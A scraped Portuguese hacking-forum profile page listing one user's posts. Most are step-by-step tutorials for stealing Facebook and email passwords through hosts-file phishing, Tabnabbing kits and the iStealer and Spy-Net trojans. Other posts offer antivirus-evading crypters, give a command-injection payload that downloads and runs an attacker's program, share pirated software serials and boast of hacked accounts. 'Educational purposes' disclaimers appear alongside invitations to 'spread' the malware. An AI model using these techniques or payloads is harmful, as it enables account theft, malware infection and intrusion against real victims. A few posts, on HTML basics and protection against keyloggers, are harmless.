    6. Existem várias maneiras de fazer isso, eu escrevi meu próprio scripts PHP para fazer o mesmo, mas eu não posso compartilhar isso com vocês porque há chances de fazer mau uso dela. Então eu explicar-lhe a lógica eo resto você precisa descobrir como vai editar vítimas em arquivo host e adicione seu endereço de IP Falso Página contra www.facebook.com.

    7. Agora depois de fazer os passos 5 e 6, sempre que o usuário abrir a www.facebook.com , sua página no Facebook falso pode abrir e vítima nunca será capaz de visitar o Facebook original, então ele não pode sequer ser capaz de alterar sua senha ... <img src="http://cyber-gamers.org/public/style_emoticons/default/tongue.png" class="bbc_emoticon" alt=":tongue:">

    8. Eu adicionei uma lógica extra para os meus scripts, sempre vítima digitar a senha e apertar ENTER, eu estou removendo a entrada de endereço IP Falso contra www.facebook.com do arquivo host, tornando-os espaços. Por isso, será para ele uma única vez que soa mais falso. Sua apenas um código de linha única, mas eu não posso dizer a vocês, porque ele vai fazer este artigo completamente anti-ético.

    Eu vou ensinar técnicas, mas eu não vou dar de mala em cuia, porque se você quer se tornar hacker bom, então você precisa usar o seu cérebro também. Gosto de ser chamado destrutivo, mas eu faço obras construtivas .. <img src="http://cyber-gamers.org/public/style_emoticons/default/ph34r.png" class="bbc_emoticon" alt=":ph34r:">

    9. Tudo além disso é semelhante à técnica de phishing normal ..
    Eu usei esse host http://www.my3gb.com/ você pode usar outro em que você carregou seus arquivos.
    Além disso, você deve saber é o endereço IP 127.0.0.1 localhost. Para você caso seu webhosting será o endereço IP que será usado para mapear contra facebook.
    Demonstração:




    https://www.virustot...sis/1342370458/
    Nota: Esta é apenas para fins educacionais.Qualquer que você fizer to nen ai nen ti conheço
  11. Upvote
    V¡®u§ got a reaction from Night_Guerreiro in Como postar uma foto no seu Facebook Chat-Box?   
    1. Entrar em sua conta no Facebook.(Se não confia faça teste em uma conta fake)

    2. Agora siga este link. : http://smileyti.me/
    3. Como sua página (Opcional).

    4. Você vai ter uma opção de upload.

    5. Carregar uma foto, preencher o captcha em seguida, pressione o botão de upload agora.

    6. Há um outro link "show code" clique sobre.

    7. Não é o seu código de imagem.

    8. Copie esse e colá-los na sua caixa de bate-papo e pressione enter.

    Agora você está pronto.
  12. Upvote
    V¡®u§ got a reaction from p0w3r0ff in Hack Senhas de Paypal, Facebook, Hotmail Usando Spy-Net   
    Como todos sabemos, na Cyber-Gamers temos discutido método de hacking vários hackear senha de conta de e-mail. Neste topico, eu vou postar a maneira mais útil sobre como hackear senha de conta de e-mail. Este software de invasão usadas para hackear senha de conta de e-mail é Spy-Net RAT. RAT, como todos sabemos, é uma ferramenta de administração remota, usado para hack computador remotamente. Spy-Net RAT é muito eficiente e simples de usar para hack paypal, hotmail senhas de conta de e-mail.

    Basicamente RAT também é um atalho chamado ferramenta Remote Administrator. é usado principalmente para fins maliciosos, como o controle do PC, roubar dados das vítimas, excluir ou editar alguns arquivos. Você só pode infectar alguém, enviando-lhe arquivo chamado servidor e eles precisam clicar nele. Hoje, neste topico eu estou indo para compartilhar um trojan para hack e roubar informações da vítima.

    Siga as instruções dadas abaixo para configurar Spy-Net RAT ...

    Passo 1: Download Spy-Net RAT para hackear computador ou senha da conta de e-mail.
    http://www.badongo.com/file/26697837
    http://www.filejungle.com/f/YX8BRv
    Password: Cyber-Gamers
    Passo 2: Agora, vá para No-ip.com e registrar uma conta. Adicionar um host, baixar No-ip do cliente e conectar ao seu host.

    Update:

    Você pode consultar Como configurar o No-IP do host para obter mais informações sobre como configurar o No-ip host.
    Ok então agora é hora de configurar Spy-Net!

    Passo 3: Agora descompacte Spt-Net [RAT] v2.6 Cyber-Gamers e, em seguida, executar o Spy-Net.exe, você receberá um popup com uma linguagem estranha, clique em NO.

    Em Spy Net, clique em Iniciar e, em seguida, Opces -> Idioma -> English.ini (isso é para alterar o idioma do SpyNet, o padrão é espanhol ou algo assim)

    Ok agora, eu enviei as fotos para que seja mais fácil.

    Passo 4: Agora vá em File -> Servidor Criar -> Selecione qualquer um dos perfis

    Passo 5: Agora vá para a guia conexão, onde ela diz "Your_Dns_here" Clique uma vez sobre ela e clique em Excluir. Em seguida, clique em Adicionar e escreva o seu endereço no-ip, e clique em Adicionar ou OK eu não sabia o que era

    Passo 6: Agora vá para a guia de instalação, e deixar tudo como está ... (Estas opções os eu uso pessoalmente)

    Passo 7: Agora vá para a guia Keylogger ...

    Ok, então eu acho que todo mundo quer o keylogger, para selecioná-lo.
    E eu prefiro usar a opção Backspace também, como se alguém logins para o Facebook, e seu e-mail é [email protected], e ele um erro de digitação e mostrou como [email protected], certeza que ele vai usar backspace e corrigi-lo, por isso este será gravado em seu keylogger e você pode obter as senhas mais fácil :)

    Passo 8: Agora vá para Anti-Debug ..

    Selecione todos eles, se você quiser testá-lo em Sandboxie, desmarque o primeiro :)

    Passo 9: Finalmente vá para Criar Servidor .. Não escolhemos o que quiser, para alterar o ícone, clique no ícone Imagem lá e selecione qualquer exe ou ico e clique no botão Criar Server para criar arquivos do servidor...

    Você agora configurar o servidor para Spy-Net RAT, agora apenas espalhar e se divertir com os escravos agora.

    Então, espero que este Spy-Net RAT tutorial de sobre como hack computador ou senha de contas de e-mail sejá útil para você.
    Lembrando que os conteúdos postados são apenas para fins educacionais, com apenas o intuito de ensinar como funciona e de como se proteger de possíveis ataques ou invasões. Cyber gamers não aconselha não orienta e nem incentiva seus usuários a fazerem invasões de nenhuma espécie e que todas as informações discutidas NO FORUM são somente a nível de conhecimento MEU CONHECIMENTO NAO é CRIME MAS SEUS ACTOS PODEM SER!
  13. Upvote
    V¡®u§ got a reaction from Ex-hacker in Chrome Crypter v1.9 FUD   
    Descrição:
    Deixe seus servidores de Trojans indetectavel pelos AVS
    Características
    FUD 0/35.
    PRIVATE RUN PE.
    Icon Changer.
    32 bit & 64 bit Support.
    Antis.
    Scan Time + Run Time FUD
    StartUp.
    Encryption.
    Drag & Drop Support.

    Testado em:
    BlackShades
    DarkComet 4,2
    SpyNet
    CyberGate
    IStealer 6.0/6.3
    VertexNet
    Download:
    http://www.badongo.com/file/26362298
    http://depositfiles....files/4phmzw0b0
    http://www.fileserve.com/file/QYvNACf
    http://www.sendspace.com/file/hihmqv
    http://www.mediafire...tx331uv6bo8f6w7
    Scan:
    http://vscan.novirusthanks.org/analysis/50666466c438c4dca003f923fe15377e/Y2hyb21lY3J5cHRlcnYxLTlmdWQtcmFy/
  14. Upvote
    V¡®u§ got a reaction from Ex-hacker in Crypter AIO FUD [2012] - Ignorar detecção de antivírus   
    Como Ardamax keylogger e WinSpy keylogger para Hack senhas de e-mail, mas o problema é que estes keylogger pode ser facilmente detectado por antivírus das vítimas. Então, para burla a detecção de antivírus, temos de cripta arquivo nosso Keylogger ou trojan do servidor usando um Crypter ....

    Como dito acima, Crypter é um software usado para esconder nossos vírus, trojans ou qualquer keylogger de antivírus para que eles não sejao detectados e eliminados pelos antivírus. Assim, um Crypter é um programa que permite aos usuários cripta o código fonte de seu programa. Geralmente, antivírus trabalho por código fonte divisão de aplicação e, em seguida, procurar determinada string no código fonte.

    Se antivírus detecta qualquer determinadas seqüências mal-intencionados, ou ele pára de digitalização ou exclui o arquivo como vírus do sistema.
    Eu já postei um Crypter FUD aqui na Cyber-Gamers, que está desatualizado agora. Então, hoje eu vou dar-lhe um FUD Crypter (totalmente indetectável por anti vírus) com o qual você pode cripta qualquer keyloggers ou vírus.

    Também fornece mais algumas características, como ícone Changing, Spoofing a extensão de alguns arquivos, gerar um downloader, Criptografe seus arquivos para FUD, Ganhar dinheiro com esta ferramenta a partir de seus bots usando o Miner Bitcoin e muito mais!! !
    Primeiro Baixe o Crypter e instalá-lo em seu computador
    Download:
    http://www.badongo.com/file/26369531
    http://www.fileserve.com/file/YxsXbzH
    http://www.mediafire...53x1e7kc233dxe8
    http://rapidshare.co...yber-Gamers.rar
    http://www.sendspace.com/file/tavfyd

    Binder para ligar (combinar) qualquer outro arquivo. Exe com o seu arquivo crypted

    Spoofer mudar a extensão de keylog ou arquivo de vírus ..

    Características:

    FUD 0/37 Crypter
    FUD 0/37 Binder
    FUD 0/37 Botnet Bitcoin Miner
    Extension Spoofer
    Obfuscator
    Icon Changer
    Downloader
    Auto Updates

    Espero que agora o são capazes de usar este ,Crypter FUD para cripta keylogger ou trojan
    para ignorar a detecção antivírus. Eu estarei adicionando mais Crypter FUD para ignorar a detecção de antivírus no computador da vítima.
    Video foi feito apénas para mostrar que o Crypter funciona , e para mostrar para aqueles que falão (Meu antivirus detecto é virus isso, Esse arquivo é seguro?).No video foi mostrado efetuando download direto dos links que estao aqui na Cyber-Gamers.Se você ainda duvida dos arquivos liberados para download NãO FAçA O DOWNLOAD E NãO FAçA MAIS AFIRMAçÕES E PERGUNTAS IDIOTAS!

    http-~~-//youtu.be/B9HZoTZXRMo
    Nota: Esta é apenas para fins educacionais.Qualquer que você fizer to nen ai nen ti conheço http://cyber-gamers.org/public/style_emoticons/default/ph34r.png
  15. Upvote
    V¡®u§ got a reaction from Strimblaster in Como proteger seu PC de keyloggers   
    O que é Keylogger?
    Keylogger é basicamente uma ferramenta de software que clones seus traços essenciais pressionado e grava-os em arquivos de log. Alguns keyloggers inteligentes ou simplesmente dizer avançados recupera as senhas salvas em navegadores e outros aplicativos Windows. Hackers usam keyloggers para hackear senhas de usuários de e-mail de contas e senhas de outros e controlar a sua actividade quotidiana.

    Como o Keylogger funciona?
    Deixa explicar isso de maneira muito simples, sempre que você pressione qualquer tecla de seu teclado ou laptop sua máquina gera um código de chave simples, que depende do formato de teclado que você está usando. Esse código chave informe o seu sistema operacional que você pressionou uma tecla específica. Agora, o keylogger é que salvar o seu curso chave em um arquivo. Agora processamento adicional depende de tipo de Keyloggers. Basicamente, existem dois tipos de keyloggers:
    1. Keylogger Física
    2. Keylogger Remoto

    O processamento acima é o mesmo para keyloggers físicos e remoto. A diferença está em como eles vão usar um arquivo de log.
    Keyloggers físicos requer acesso físico ao sistema da vítima, para que hacker pode instalá-lo manualmente. Ele pode ser seu amigo, irmão, irmã ou alguém próximo que realmente tem acesso físico ao seu PC ou laptop. Agora, para obter registros também ele tem que acessar manualmente o seu PC para verificar logs. Mas hoje em dia poucos bons keyloggers físicos estão lá, que envia os logs no endereço de e-mail. Então, hoje nós só precisamos de um tempo de acesso físico e isso é só para instalar Keylogger e configurar um endereço de e-mail para enviar logs.

    Keyloggers remotos são um pouco diferentes, pois há nome sugere que pode ser instalado a partir remoto, significa que você não precisa de nenhum acesso físico. Keyloggers remoto durante a configuração gera um servidor que pode enviar à vítima e que não necessita de qualquer instalação. Keylogger remoto mantém os registros em arquivos de log e quando a vítima se conecta a Internet, enviar os logs para o endereço de e-mail hacker ou conta de FTP que ele putted durante o tempo de configuração para receber os logs.

    SOLUçãO PARA KEYLOGGERS:
    Como todos sabemos keyloggers novos são sempre FUD (totalmente indetectável) para o nosso antivírus não mostra quaisquer mensagens de aviso, enquanto a infecção. Então, o melhor método para se proteger de keyloggers é que encriptar seus traços essenciais, usando misturadores-chave. O que um keylogger faz é que ele monitora teclas, então quando nós transferimos nossos traços essenciais, Hacker ainda vai receber os logs, mas que lixo como as nossas chaves são criptografadas e, portanto, ele não recebe nada e vítima permanecerá seguro de seu keylogger.

    Vamos entendê-la com o exemplo. Suponha que você digitou

    Cyber-Gamers

    O scrambler chave vai fazer? Ele irá criptografar sua chave cada pressionada em algum código de lixo e keylogger vai ter isso como algo como:

    sT @ AD9; 8in = P

    Então amigos o que fez scrambler é que ele tem criptografados suas teclas e te salvou de cair em kl de hackers. Seguro e se proteger de keyloggers como você não pode evitá-los o que você pode apenas fazer é enganá-los, criptografando suas teclas.
    Download:
    Badongo - DepositFile - Fileserve - Mediafire - Rapidshare - Sendspace -
  16. Upvote
    V¡®u§ got a reaction from veNoNx in Introdução ao HTML   
    Todo documento HTML é composto de Tags. Este é o nome dados aos comandos HTML. Você deve começar sua página com a tag <HTML>, na primeira linha do código, e terminar com </HTML> na última linha do documento. Perceba que a barra "/" sinaliza o fechamento da tag. Este fechamento é necessário para que ela possa ser interpretada pelo navegador. A estrutura das tags é formada por:
    <xxx>: Este é o inicio da tag;*

    </xxx>: Este é o fechamento da tag para que ela possa funcionar.**
    * xxx é apenas uma representação de uma tag, não é uma tag HTML.

    ** Algumas tags não necessitam do fechamento. Neste caso você será avisado.
    Entre o início da tag e o seu fechamento ficam os textos, parâmetros, atributos e até outras tags que vão formando a sua página. Se você não fechar corretamente as tags, a página não irá ser mostrada direito ou nem mesmo irá aparecer.
    Após iniciar o documento com a tag <HTML> você deve incluir o cabeçalho que é feito com as tags <HEAD> </HEAD>. E também um título usando o par <TITLE> ... </TITLE>. Geralmente, o título não é mostrado na página, porém os navegadores o utilizam para entitular a janela de visualização. Coloque um título bem claro e explicativo para seus documentos.
    - A tag <BODY>
    O "corpo" do documento deve ser demarcado pelo par <BODY> ... </BODY>. Nesta parte do documento serão colocados todos os comandos para apresentação de uma página HTML. Entre as tags <BODY> e </BODY> é que você vai colocar todos os códigos para sua página.
    Um documento simples seria digitado da seguinte maneira:
    <HTML>

    <HEAD>

    <TITLE> Meu documento HTML </TITLE>

    </HEAD>

    <BODY>

    Aqui você coloca os comandos em HTML.

    </BODY>

    </HTML>



    Os espaços em branco são ignorados quando o navegador "lê" o código. Assim o código acima poderia ser escrito da seguinte forma:



    <HTML><HEAD><TITLE> Meu documento HTML </TITLE></HEAD><BODY>Aqui você coloca os comandos em HTML.</BODY></HTML>



    A vantagem é que isto economiza espaço em disco, mas é uma maneira muito confusa e relaxada de programar. Acostume-se a organizar seus programas para poder entendê-los posteriormente.



    - Atributos do <BODY>



    Através de atributos de <BODY>, podemos definir cores para os textos, links e para o fundo das páginas, bem como uma imagem de fundo (papel de parede da página):



    <BODY BGCOLOR="cor" TEXT="cor" LINK="cor" ALINK="cor" VLINK="cor" BACKGROUND="imagem que vai aparecer">



    Onde:



    - BGCOLOR

    Cor de fundo (padrão: cinza ou branco)



    - TEXT

    Cor dos textos da página (padrão: preto)



    - LINK

    Cor dos links (padrão: azul)



    - ALINK

    Cor dos links, quando acionados (padrão: vermelho)



    - VLINK

    Cor dos links, depois de visitados (padrão: azul escuro ou roxo)



    - BACKGROUND

    Imagem de fundo. Saiba como colocar uma imagem de fundo clicando aqui.



    Em "cor", você pode colocar os valores de cores em inglês como:



    Preto = black

    Branco = white

    Azul = blue

    Amarelo = yellow

    Vermelho = red



    Você também pode usar o valor hexadecimal de cores ou "RRGGBB", que é a forma mais comum de definir cores usadas na Internet.. Com isso você pode colocar em sua página outras cores diferentes, como um azul-claro. Para isso você deve ter o código das cores, e no lugar de escrever o nome da cor em inglês, você coloca o valor da cor
  17. Upvote
    V¡®u§ got a reaction from André Rochato in Camtasia Studio 7.1.1 build 1785   
    Estilo: Utilitário
    Tamanho: 174 MB
    Formato: Rar
    Idioma: Inglês
    O Camtasia Studio é um aplicativo completo para a criação e edição de vídeos a partir do ambiente de trabalho do Windows. Com ele, você cria diversos tipos de vídeos explicativos sem dificuldades, como tutoriais de programas, apresentações e atividades comuns no computador.
    Além da captura, pode ser utilizado como um ótimo programa para edição de vídeos, pois traz até mesmo clipes para serem utilizados.
    variedade para Gravação e edição
    A quantidade de recursos oferecidos pelo Camtasia Studio é realmente enorme. Ao abrir o programa, um projeto já existente aparece. Ao pressionar o "play" você percebe que, na verdade, trata-se de um vídeo que explica todo o funcionamento do programa. E, caso você goste de explorar, pode ver como ao que você assiste foi feito ao olhar a linha do tempo, na parte de baixo da tela.
    Para começar um novo vídeo, vá até a opção "File" e selecione "New Project". Você pode editar o vídeo normalmente ao importar conteúdo ou começar a gravar a tela.
    Gravando a tela
    Capturar tudo o que aparece na tela é a maior especialidade deste aplicativo. Para fazer isso, basta clicar no botão "Record the Screen" (Gravar a tela). Ao fazer isso, um painel é aberto com todas as opções para gravação. Em "Select Area" você define se quer capturar toda a tela ("Full Screen") ou um tamanho personalizado ("Custom").
    Logo ao lado, em "Recorded Inputs" você seleciona quais dispositivos devem ser utilizados durante a captura, como a webcam e o som. Quando tudo estiver pronto e configurado, use o botão "Rec" para começar a gravar. Para parar tudo, use a tecla "F10".

    Dependendo do tamanho que você escolheu, uma janela para a escolha das dimensões do vídeo pode aparecer na tela. Se você planeja uma resolução específica, preencha em "Width" (largura) e "Height" (altura) e pressione "Ok".
    Edição
    Após a captura ser concluída, o vídeo aparece na linha do tempo (localizada na parte de baixo da tela). Em "Library" você encontra uma série de clipes de áudio e vídeo para usar na edição, que podem ser facilmente arrastados para a linha do tempo. Se você quiser usar vídeos, sons e imagens de sua propriedade, use o botão "Import Media" para adicioná-los ao projeto.
    Como tutoriais em vídeo precisam ser bastante explicativos, o programa traz uma série de recursos para usar como destaques. Em "Callouts" você encontra formas geométricas para adicionar ao vídeo, como flechas e retângulos. Cada uma pode ter personalizações, como borda, preenchimento e efeitos. Você também pode adicionar palavras.

    "Zoom-n-Pan" é uma opção para aproximar em regiões específicas da tela. Ou seja, você pode fazer com que o vídeo seja centralizado em uma opção para mostrar com mais detalhes para a pessoa que for assistir. Para isso, basta selecionar a área desejada com o quadrado na parte esquerda da tela. Conforme você faz isso, algumas barras aparecem na linha do tempo com indicação de uso da função.
    Se o que você quer é configurar o som do vídeo, vá à opção "Audio", que permite regular o nível do volume e reduzir ruídos. Para ver mais opções, clique no botão "More". Assim, você encontra a função "Transitions", para adicionar transições ao vídeo entre um clipe e outro. Em "Title Clips" você coloca títulos na tela.
    Para criar uma narração, vá a "Voice Narration". Você pode escolher uma das três faixas de som e começar a gravar com o microfone enquanto o vídeo passa na tela. Dessa forma, o vídeo fica mais explicativo. Gostaria de adicionar também legendas? A opção "Captions" é para isso. E, por último, também é possível montar um quiz para aumentar a interatividade ao clicar em "Quizzing".

    Projeto pronto. Hora de exportá-lo
    Se você terminou o projeto e quer salvá-lo em um arquivo de vídeo, vá à opção "Produce and share", no topo da tela. é possível escolher um dos vários perfis pré-definidos para salvar: "Web", "Blog", "CD/DVD", "HD", "iPhone", "iPod", "Screencast.com" e "YouTube". Depois, basta dar um nome, escolher a pasta de destino e aguardar o resultado.


    Serial:
    GCABC-CPCCE-BPMMB-XAJXP-S8F6R
    CD2AA-QZBHD-C3KJL-E9HRV-Q797C
    EA5AC-CLMAM-A8W6W-EZLYM-LM58F
    HLCZF-HDCPL-KGB6W-ZSCAZ-VF6A2

    Download
    http://download.techsmith.com/camtasiastudio/enu/camtasia.msi
  18. Upvote
    V¡®u§ got a reaction from p0w3r0ff in Hack websites utilizando injeção de comandos   
    To de volta http://cyber-gamers.org/public/style_emoticons/default/ph34r.png
    Qual é a injeção de comandos?
    Injeção de comandos é um método de ataque em que altera o conteúdo gerado dinamicamente em uma página da Web digitando comandos shell em um mecanismo de entrada, como um campo de formulário que não tem restrições de validação eficazes. Podemos explorar essa vulnerabilidade para obter acesso não autorizado a dados ou recursos de rede. Quando os usuários visitam uma página da Web afetada, seus navegadores interpretar o código, que pode causar comandos maliciosos sejam executados em computadores dos usuários e em suas redes. O objetivo do ataque de injeção de comando é para injetar e executar comandos especificados pelo atacante no site vulnerável. Em situação como esta, a aplicação, que executa os comandos do sistema não desejadas, é como uma concha pseudo sistema, e que o atacante pode usá-lo como qualquer usuário do sistema autorizado. No entanto, os comandos são executados com os mesmos privilégios e meio ambiente como o aplicativo tem. Ataques de injeção de comando é possível na maioria dos casos por falta de correta validação de dados de entrada, que pode ser manipulado pelo atacante (formulários, cookies, cabeçalhos HTTP, etc.)
    Isso pode acontecer em qualquer linguagem de programação, mas é muito comum em PERL, PHP e CGI shell baseado. é menos comum em Java, Python e C + + .. http://cyber-gamers.org/public/style_emoticons/default/happy.png eu não tentei ainda lá, tentei uma vez ou duas vezes, mas não é capaz de fazê-lo, por isso incomum .. http://cyber-gamers.org/public/style_emoticons/default/rolleyes.gif

    Vamos entender as coisas através de exemplos
    Considere o código abaixo PHP:
    <?PHP
    $email_subject ="Bem-vindo à Cyber-Gamers";

    if ( isset ($_GET {'email'} ) ) {
    system( "mail " + $_GET {'email'}) + "-s ' " + $email_subject +
    " ' < /tmp/email_body", $return_val);
    }
    ?>


    O código acima é um exemplo onde o usuário envia o seu endereço de e-mail no parâmetro e-mail, e que a entrada do usuário é colocado diretamente no comando do sistema.
    Agora semelhante ao SQL injection ou injeção XPath, nosso objetivo é injetar o comando shell para o parâmetro-mail, mas tornar o código certo antes e depois do parâmetro e-mail permanecem sintaticamente corrigir caso contrário, a injecção não será executado.
    Considere o sistema () chamada como jogo pequeno quebra-cabeça onde arranjar peça de quebra-cabeça diferente para fazer uma única imagem. Todas as peças, exceto uma parte estão no seu lugar, agora temos de encontrar a parte do meio para terminar o quebra-cabeça .. http://cyber-gamers.org/public/style_emoticons/default/laugh.png tarefa simples no jogo, mas pouco complicado na injeção de comandos. Assim, nosso objetivo é algo mostrado abaixo:
    mail [missing puzzle part] -s 'Bem-vindo à Cyber-Gamers' </tmp/email_body


    Nota: Para a peça de quebra-cabeça faltando, precisamos garantir que o comando é executado corretamente e-mail e sai corretamente, basicamente, eu quero concentrar-se na sintaxe, deve ser sintaticamente correto.

    Para o correio exemplo - corridas de ajuda vontade e saídas corretamente. Agora podemos acrescentar outros comandos shell adicionais, separando os comandos por um ponto e vírgula (;).
    Nós também podemos comentar a parte de quebra-cabeça faltando usando o símbolo shell comentando (#) na frente. Assim, podemos manipular a peça de quebra-cabeça faltando conforme abaixo:
    --help; wget http://somehackersit...attack_program; ./attack_program #


    Agora, a adição de nossa parte de quebra-cabeça faltando para o nosso comando shell original existente, o comando abaixo shell é criado:
    mail --help; wget http://somehackersit...attack_program; ./attack_program # s 'Bem-vindo à Cyber-Gamers' < /tmp/email_body


    Este comando resultante é equivalente a abaixo de comando:
    mail --help; wget http://somehackersit...attack_program; ./attack_program


    O comando acima irá corre o e-mail - help e então faz o download do programa de ataque de somehackersite.com e executa-lo em vítima, permitindo que o hacker para executar os comandos arbitrários no site vulnerável. Na maioria dos casos, fornecer o acesso completo ao diretório raiz .. http://cyber-gamers.org/public/style_emoticons/default/sleep.png Agora fazer o que você quiser....
    Nota: Esta é apenas para fins educacionais.Qualquer que você fizer to nen ai nen ti conheço http://cyber-gamers.org/public/style_emoticons/default/ph34r.png
  19. Upvote
    V¡®u§ got a reaction from p0w3r0ff in + de 1.000 Contas de Facebook Hackiadas   
    POW rlx tirei facebook de vcs desta lista ai
    vo coloka na proxima lista http://cyber-gamers.org/public/style_emoticons/default/laugh.png http://cyber-gamers.org/public/style_emoticons/default/laugh.png
  20. Upvote
    V¡®u§ got a reaction from GunTL in Melhores Password Hacking Tools Cracking 2012   
    Estou a compartilhando com vocês a última coleção de "Ferramentas Hacking password 2011". Usando este kit de hacking você será capaz de hack uma grande quantidade de senhas, como o Windows senha de administrador, passwords pdf, senhas de arquivos zip, senhas de documentos, senhas .rar e muito mais .. Tenho certeza que você vai gostar deste topico!.

    Este Kit password Hacking Contem:

    1. PDF Password Remover
    2. Windows XP Remover Senha do Administrador
    3. Zip Password Cracker File.
    4. SQL Password Remover
    5. Microsoft Office Password Remover.
    6. Microsoft Windows Vista Password Remover.
    7. Rar Password Cracker Arquivo
    8. O Windows Password Recovery Kit
    9. Password Changer.
    10. Distribuídos da recuperação da senha do arquivo ..
    e muito mais ..

    Como o nome das ferramentas sugere Kit completo para obter senha hacking. Então visitantes Desfrute das últimas ferramentas Hacking atualizadas ..
    1. Faça o download do Kit Password Hacking a Abaixo:
    DepositFile - Fileserve -
    2. Extraia o arquivo e instalá-lo.

    3. Então Registre-los e usá-los. (Contém todas as ferramentas completo de crack e keys e patches) ...
    Questionário:
    P: Tem virus?
    R: Não so o virus que faz os softwares funcionar
    P:Ele prejudica o computador?
    R: Não ele não é prejudicial ao seu Sistema Operacional
    P: Você infecto com algum virus?(Keylogger,Trojan,etc...)
    R:Não
    P:Posso confiar em você?
    R:Quer saber vai se fud... Não baixe _!_ http://cyber-gamers.org/public/style_emoticons/default/angry.png
  21. Upvote
    V¡®u§ got a reaction from p0w3r0ff in Como Hackear conta de Facebook usando [Tabnabbing]   
    Olá Manolos(a) No meu topico anterior postei como Hack face usando istealer agora vo mostra com uma pagina fake Tabnabbing.

    Tabnabbing é um tipo moderno de método usado para phishing hackear senhas sites. Como todos sabemos ataque Phishing normal é facilmente detectável em muitos sites, como Facebook, Gmail, Yahoo, etc

    Como o Facebook implementou um código extra que valida a URL anterior chegando e algumas funções básicas. Se a página a partir do qual você chegou é um Phish Facebook ou página falsa, ele exibe uma mensagem de aviso ao usuário que você foi chegou a partir da página fraudulenta ou falsa. Então, por favor. Então Vítima facilmente veio a saber que foi feita de bobo por alguém e ele muda a sua senha da conta novamente.(Resumindo entre no face dela e jah zue um monte http://cyber-gamers.org/public/style_emoticons/default/tongue.png )
    1. Download Facebook Tabnabbing.
    Badongo - DepositFile - Fileserve - Mediafire - Rapidshare - Sendspace -
    2. Extraia ele irá conter tres arquivos:
    um. Facebook.html (página de login falsa do Facebook)
    b. login.php (Script que captura os detalhes de login da vítima
    c. tabnabb (script Java que é necessário para tabnabbing)

    3. Agora, para qualquer webhost anônimo (qualquer link), fazer upload de arquivos este Facebook.html, login.php. Você pode usar my3gb.com, 110mb.com ou freewebhost.com ou t35.com para isso, tal como são free.
    4. Agora tabnabb.js abertas usando um bloco de notas, procure "Digite sua URL aqui", agora substituí-lo com o seu url "Facebook.html", que você carregou na etapa anterior, finalmente salvá-lo e fazer o upload tabnabb.js a sua conta de hospedagem.

    5. Após bem sucedida upload, Verifique se o hack está funcionando, clique no link Facebook.html e abri-lo, você vai ver página do facebook fake.

    6. Para tornar a url (name.webhost.com / index.html) curto entrar neste site:
    (Logo faço um tutorial sobre este site)
    http://www.dot.tk/en...ex.html?lang=en
    7. Se quiser mandar seu Tabnabbing por e-mail anonimo use : http://emkei.cz/
    8. Agora, enviar página facebook.html a caixa de entrada vítima de que vc quiser hack Facebook .

    9. Quando, ele entrará com este phisher facebook à sua conta do Facebook, um novo arquivo "log.txt" será criado, que conterá facebook senha hacked em formato de texto simples e ele será redirecionado para a página Facebook.com / carreiras para evitar suspecion .


    LEMBRANDO : Este tutorial e so para fins educacionais http://cyber-gamers.org/public/style_emoticons/default/blink.png .Qualquer que você fizer to nen ai nen ti conheço http://cyber-gamers.org/public/style_emoticons/default/ph34r.png
  22. Upvote
    V¡®u§ got a reaction from p0w3r0ff in Hack Facebook/Twitter usando Istealer   
    Istealer é um eficiente software usado para hack vários senhas de conta de e-mail como paypal, facebook . Tenho desde link para download do software. Usando Istealer você pode facilmente hackear ou roubar a senha de conta no Twitter, Facebook , conta Gmail, Hotmail, Yahoo entre outros facilmente.

    Basicamente, neste truque que você criar o arquivo do servidor que é usado para capturar as teclas de sua vitima, após a criação de arquivos do servidor você tem que enviar esse arquivo para slave e usar um pouco de engenharia social para levá-los a clicar no arquivo do servidor e executar o arquivo do servidor. Depois que o arquivo do servidor é executado, ele irá iniciar o seu trabalho como capturar as teclas digitadas, etc....

    Siga os seguintes passos para configuração o Istealer para hackear senha de conta de e-mails,


    PASSO 1: Free download Istealer software usado neste tutorial:
    Badongo - DepositFile - Fileserve - Rapidshare - Sendspace -

    Concerteza seu AV ira avisar como virus mais é um virus inofencivo é apenas para o funcionamento do software!.
    (Não acredita? Problema seu procure o programa no google.com , se não quer procura nen termine de ler este tutorial vai comer pipoca http://cyber-gamers.org/public/style_emoticons/default/rolleyes.gif)

    PASSO 2: Vá a um serviço de webhosting free como
    http://www.esmartstart.com/ ou http://www.000webhost.com/ e se inscrever . Aqui eu estou usando o 000webhost.



    Confirme no seu e-mail que você colocou no passo acima!

    Clique em Create New criando o seu host
    Dai Agora, a conta é feita. (Apos confirmar apartir do seu e-mail)
    Agora, faça o login na conta e vá para o Painel de Controle (CPanel)
    Desloque-se para MySQL em "Software / Services".

    Siga esta imagem agora:

    Agora, salve a informação que recebemos sobre na página seguinte no bloco de notas.

    PASSO 3: Criação de arquivo index.php (Php Logger)

    Extrair o iStealer6.3_Legends_2. rar e depois entre na pasta PHP Logger(Index) o arquivo
    você verá dois arquivos.
    index.php
    style.css
    Index.php aberto usando o notepad e siga essa foto:

    Para lembrar: O administrador e administrador que você entrou em $ username e $ linha de senha é a senha para ver seus logs.

    PASSO 4: Fazendo o seu index.php indetectável pelos no 000webhost

    Abrir o Index.php e alterar as seguintes linhas
    PHP Code:$html = "<html><head><title>iStealer 6.1 Legends Log manager - ";To
    PHP Code:$html = "<html><head><title>My Personal Software manager - "; and
    PHP Code:$footer = "<div id='footer'>iStealer 6.1 Legends - Kizar Labs 2009</div> </div> </body> </html>";ToPHP Code:$footer = "<div id='footer'>Backup manager - Backup Script 2010</div> </div> </body> </html>";



    Agora faça o download e instalar este software: TrueBug Obfuscator PHP & Encoder. (Vai no google e ache , e versão de teste )
    Abra-o e vá em "Arquivos e Pastas"
    Pasta Source - pasta de seleção contendo seus scripts PHP, clique no botão Procurar ao lado da caixa de nome da pasta. Pasta de destino - pasta onde os arquivos selecione e codificado irá salvar, clique no botão Procurar ao lado da caixa de nome da pasta. Selecione os arquivos a ser codificado, clique no check-box frente do nome do arquivo (index.php) no arquivo de caixa de lista
    Agora, para ir "...& Encode" as opções de saída como "... & Encode" e verificar tudo e clique em "Process" em seguida, pressione o botão "Fechar" e também o programa fechar.
    Você vai encontrar um index.php obduscated na pasta de saída que você selecionou. Agora lembre-se este é o index.php que você tem que fazer o upload para 000webhost, não o original.

    PASSO 5: Transferindo arquivos (index.php e style.css na 000webhost)

    Vá para o seu Painel de Controle do 000webhost
    Agora, vá em File Manager. Se ele pede senha, consulte o "Ver Detalhes FTP", que aparece ao lado de File Manager no Painel de Controle.
    Agora para ir public_html. Em seguida, clique em "New dir". Digite o nome do diretório, como hobby ou trabalho ou algo parecido.
